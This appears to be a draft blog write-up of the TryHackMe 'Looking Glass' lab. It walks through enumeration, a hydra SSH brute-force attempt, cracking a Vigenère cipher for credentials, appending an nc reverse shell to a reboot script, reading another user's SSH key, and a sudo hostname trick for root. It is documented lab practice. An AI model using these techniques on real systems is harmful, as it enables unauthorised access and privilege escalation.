---
title: "Looking Glass THM Write Up"
date: 2022-01-18T11:55:36-05:00
draft: true
---

Table of Contents
Gettting Ready
Information Gathering
Gaining Jabberwoxk
Gaining Tweedledum
Gaining HumptyDumpty
Gaining Alice
Gaining Root
Getting Ready
export  ip=10.10.123.109echo $ip
Information Gathering

Service Enum
rustscan -a $ip rustscan -a $ip -- -A -sCautorecon $ip
SSH
Version: OpenSSH 7.6p1 Ubuntu 4ubuntu0.3
Auth Methods:
Attempted to bruteforce it with hydra -L /usr/share/seclists/Usernames/top-usernames-shortlist.txt -P /usr/share/seclists/Passwords/xato-net-10-million-passwords-100.txt -t 4 ssh://10.10.123.109

Open ports

Too many to count; decided to install Greenbone Vulnerability Management to enumerate over all service ports to find vulnerabilities.
Gaining Jabberwock




It looks like a poem ran through a cipher. At the top it says "Jabberwocky", so I googled "Jabberwocky looking glass" and found the poem.
This took awhile to get. I found a website https://www.boxentriq.com/code-breaking/vigenere-cipher that analyzes your cipher and spits out the most probable case. It found it was most likely using a Vingere Cipher Standard Variant. I read the poem through and found the last encrypted line didnt line up with the plaintext poem. I took the last line of the last stanza and ran it through several ciphers and possible keys, including:
Author's pen name
Author's real name
Name of the poem
Name of the room
After a lot of trial and error, I noticed the cipher analyzer needed more than 25 characters to get an accurate output. I decided to grab the last stanza, including our out of place encrypted string, and analyze it.
We have our secret! I made the max key length 40 and had it run through 100 iterations.
After inputting the secret, we were rewarded with what looked like SSH credentials. jabberwock:PlantedHappenRosesAdmire

Gaining Tweedledum
With our new creds, we were able to login as jabberwock. ls -lah showed us a user.txt, however when we cat it, it seems to be mirror. Ran it through https://www.textreverse.com/mirror-text-generator.php and it worked!
Tried sudo -l
I can run reboot as root, but thats about it
Now it was time from some privesc enum. Tried to get linpeas.sh with http server but forgot http isnt open, so I used scp instead and it worked.scp linpeas.sh jabberwock@$ip:/home/jabberwock
Made linpeas.sh executable
Found tweedledum runs our twasBrillig.sh upon reboot
Also found nc is on our target:
Tried nc $ip 1337 -e /bin/bash, but -e was not an option, so man nc and searching for -e reveals how to perform the same function:
nc reverse shell appended to twassBriliig.sh; rebooted machhinemy machine: nc -lvp 1337target: sudo reboot
Now we were tweedledum





Gaining HumptyDumpty
https://medium.com/infosec-adventures/identifying-and-cracking-hashes-7d580b9fd7f1


Cracked the first 7 hashes; last hash needed to be put into cyberchef to reveal password. zyxwvutsrqponmlk
Tried su or sudo to humpty; didnt work
Tried to ssh to all users with password, also didnt work
Probably need to get an upgraded shell
Logged back in as jabberwock, su humptydumpty, and the password worked
Gaining Alice
Only thing in here is a poetry.txt
Humpty also has no sudo perms
Tried to do another linpeas.sh run as humpty, but didnt find anything useful to move forward.
Read poetry.txt in its entirety to look for clues, even googled it.
Was able to cd /home/alice, but not view anything
Checked /home permissions and found everyone had execute permissions on /home/alice:
Tried to cat each file that was in /home/jabberwock to /home/alice to see if they matched up, but nothing gave
I remember I had tried humpty's password on alice and it gave me the possible auth methods:
I then tried find / -name .ssh and saw find: ‘/home/alice’: Permission denied, which means she does have an ssh key.
cat /home/alice/.ssh/id_rsa revealed a key we could ssh with as alice!
chmod 600 alice_ssh.key made it so I could ssh in as alice




Gaining Root
Now that we are alice, ls -lah reveals:
Tried sudo -l, but requires password
Some more enumeration with linpeas.sh as alice; cp /home/jabberwock/linpeas ., chmod +x linpeas.sh, ./linpeas.sh -a > output.txt, less -r output.txt , found:
Tried sudo -h ssalg-gnikool /bin/bash, worked
root.txt is exactly where you thought it would be


